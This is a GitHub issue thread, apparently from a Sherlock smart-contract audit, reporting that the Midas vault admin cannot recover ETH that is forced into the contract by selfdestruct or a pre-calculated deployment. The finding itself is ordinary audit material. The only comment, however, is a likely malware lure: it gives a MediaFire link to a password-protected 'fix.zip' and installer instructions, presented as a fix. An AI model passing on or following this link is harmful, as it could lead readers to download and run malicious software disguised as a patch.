### ISSUE TITLE
Oblivionis - Admin cannot get ETH from contracts

### ISSUE THREAD

**Issue by sherlock-admin4** [sherlock-audit/2024-08-midas-minter-redeemer-judging#86]
Oblivionis

Medium

# Admin cannot get ETH from contracts

## Summary

Accoring to Specifications, Admin can transfer any token that is in the smartcontract. However admin cannot transfer ETH sent to the contract.

## Vulnerability Detail

Accoring to `Product Requirements`, it is specified that "We want the admin to be able to rescue any token in our smartcontract, and transfer them at will to any wallet.".
```solidity
    function withdrawToken(
        address token,
        uint256 amount,
        address withdrawTo
    ) external onlyVaultAdmin {
        IERC20(token).safeTransfer(withdrawTo, amount);

        emit WithdrawToken(msg.sender, token, withdrawTo, amount);
    }
```

However, such function cannot handle ETH transfer. 

Even if the contract does not have receive/fallback or any payable functions, it is still possible for a user to send ETH to the contract in one of the following two ways:

1. Selfdestruct
When the SELFDESTRUCT opcode is called, funds of the calling address are sent to the address on the stack, and execution is immediately halted. Since this opcode works on the EVM-level, Solidity-level functions that might block the receipt of Ether [will not be executed](https://solidity.readthedocs.io/en/develop/security-considerations.html#sending-and-receiving-ether).

2. Pre-calculated Deployments
Additionally, the target address of newly deployed smart contracts is generated deterministically. The address generation can be looked up in any EVM implementation, such as the [py-evm reference implementation](https://github.com/ethereum/py-evm/blob/e924f63992a35212616b4e20355d161bc4348925/eth/_utils/address.py#L17-L18) by the Ethereum Foundation:
```python
def generate_contract_address(address: Address, nonce: int) -> Address:
    return force_bytes_to_address(keccak(rlp.encode([address, nonce])))
```

It is possible a user send ETH to midas vault before deployment.

## Impact

Protocol cannot get ETH from vaults, breaks the specification: Admin can transfer any token that is in the smartcontract.

## Code Snippet

https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/abstract/ManageableVault.sol#L189-L197

## Tool used

Manual Review

## Recommendation

Acknowledge the risk

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
